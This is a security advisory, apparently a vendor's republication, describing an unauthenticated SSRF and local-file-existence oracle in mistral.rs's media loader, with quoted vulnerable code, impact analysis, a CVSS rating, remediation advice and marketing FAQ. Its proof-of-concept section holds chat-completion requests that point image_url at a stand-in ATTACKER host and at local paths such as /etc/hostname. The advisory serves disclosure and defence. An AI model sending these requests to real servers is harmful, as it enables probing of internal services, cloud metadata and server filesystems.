Summary
mistral.rs Media Loader: Unauthenticated SSRF and arbitrary local file read via image_url
mistral.rs fetches any request-supplied image/audio URL with no host or IP validation, and opens arbitrary local files (a file:// URL, or any existing relative/absolute path). A remote, unauthenticated client of any vision/audio deployment can cause the server to issue requests to internal or cloud-metadata addresses (SSRF) and to open arbitrary local files, via the standard OpenAI image_url / audio_url message content. The server is unauthenticated by default.
Details
parse_image_url in mistralrs-server-core/src/util.rs (lines 45-88) resolves the request string and fetches/opens it:
let url = if let Ok(url) = url::Url::parse(url_unparsed) {
url
} else if File::open(url_unparsed).await.is_ok() { // a bare existing path (relative or absolute)
url::Url::from_file_path(std::path::absolute(url_unparsed)?) ...
} else { bail!(...) };
let bytes = if url.scheme() == "http" || url.scheme() == "https" {
reqwest::get(url.clone()).await ... // SSRF: no host/IP/allowlist check
} else if url.scheme() == "file" {
File::open(path).await ... read // arbitrary local file read
} else if url.scheme() == "data" { ... base64 ... };
reqwest::get has no allowlist, no private/loopback/link-local/metadata block, and follows redirects by default. The file scheme (and any bare path that already exists on the server, resolved at line 48) is opened and read. parse_audio_url (line 91) is identical for audio_url.
The value reaches this unvalidated: mistralrs-server-core/src/chat_completion.rs calls parse_image_url(&url_unparsed) / parse_audio_url(&url_unparsed) on the chat message content, at request time.
For reference, vLLM gates outbound media domains (allowed_media_domains) and local paths (allowed_local_media_path); mistral.rs has neither.
Proof of concept
On a default vision deployment, unauthenticated:
SSRF - the server fetches the attacker URL during request processing:
POST /v1/chat/completions
{"model":"<vlm>","messages":[{"role":"user","content":[
{"type":"image_url","image_url":{"url":"http://ATTACKER/probe"}},
{"type":"text","text":"hi"}]}],"max_tokens":1}
An out-of-band HTTP GET arrives at ATTACKER; a redirect to an internal/metadata address is followed.
Arbitrary local file open, with a file-existence oracle in the response body (an existing file and a nonexistent path return different errors):
existing file (opened and read, then fails to decode):
POST /v1/chat/completions
{"model":"<vlm>","messages":[{"role":"user","content":[
{"type":"image_url","image_url":{"url":"/etc/hostname"}},
{"type":"text","text":"hi"}]}],"max_tokens":1}
-> 500, response body message: "The image format could not be determined"
nonexistent path:
POST /v1/chat/completions
{"model":"<vlm>","messages":[{"role":"user","content":[
{"type":"image_url","image_url":{"url":"/nonexistent"}},
{"type":"text","text":"hi"}]}],"max_tokens":1}
-> 500, response body message: "Invalid source '/nonexistent': not a valid URL (http/https/data) and file not found on server. ..."
The difference is structural: parse_image_url (util.rs:48) takes the file branch only when File::open(url_unparsed) succeeds, otherwise it bails with "file not found on server" (util.rs:52); an existing-but-non-image file is read and then fails in image::load_from_memory (util.rs:87). The error response carries sanitize_error_message (util.rs:210), which returns the root-cause message, so both reach the client verbatim.
Impact
An attacker with network access to a default vision/audio deployment can reach internal services and the cloud metadata endpoint (SSRF, confirmed end to end). The fetched bytes go to a media decoder, not back to the attacker, so the SSRF is blind: egress to attacker-chosen internal hosts is the usable primitive. The loader also opens a request-supplied file:// URL or any existing local path, and the response distinguishes an existing file from a nonexistent path (and an existing non-image file from a directory), giving an unauthenticated file-existence and file-type oracle over the server filesystem. The file contents are not returned, so this is an existence/enumeration oracle, not content disclosure.
Availability (CVSS A:L): reqwest::get (util.rs:61) uses the default client, which has no timeout, and http_resp.bytes() (util.rs:62) reads the entire response body with no size cap, so an attacker-chosen unbounded or non-responding host exhausts or ties up a worker. The file branch allocates vec![0; metadata.len()] (util.rs:73) before reading, so pointing at a large local file does the same.
Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside. Typical impact: access to internal metadata services, internal APIs, or cloud credentials.
GHSA-WFGQ-W7CQ-QJ7J has a CVSS score of 7.2 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.8.18); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Already deployed Kodem?
See it in your environmentNew to Kodem? Get a demo →Remediation advice
Restrict request-supplied media to http(s) and data:; do not resolve bare strings to local files and do not honor the file scheme from request input (gate any local-media behind an explicit, default-disabled option). Before fetching http(s), resolve the host and reject non-global IPs (private / loopback / link-local / metadata), pin the connection to the validated IP, and re-validate redirects (or disable them). Cap the read size.
Frequently Asked Questions
- What is GHSA-WFGQ-W7CQ-QJ7J? GHSA-WFGQ-W7CQ-QJ7J is a high-severity server-side request forgery (SSRF) vulnerability in mistralrs-server-core (rust), affecting versions <= 0.8.17. It is fixed in 0.8.18. Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside.
- How severe is GHSA-WFGQ-W7CQ-QJ7J? GHSA-WFGQ-W7CQ-QJ7J has a CVSS score of 7.2 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of mistralrs-server-core are affected by GHSA-WFGQ-W7CQ-QJ7J? mistralrs-server-core (rust) versions <= 0.8.17 is affected.
- Is there a fix for GHSA-WFGQ-W7CQ-QJ7J? Yes. GHSA-WFGQ-W7CQ-QJ7J is fixed in 0.8.18. Upgrade to this version or later.
- Is GHSA-WFGQ-W7CQ-QJ7J exploitable, and should I be worried? Whether GHSA-WFGQ-W7CQ-QJ7J is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether GHSA-WFGQ-W7CQ-QJ7J is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix GHSA-WFGQ-W7CQ-QJ7J? Upgrade
mistralrs-server-coreto 0.8.18 or later.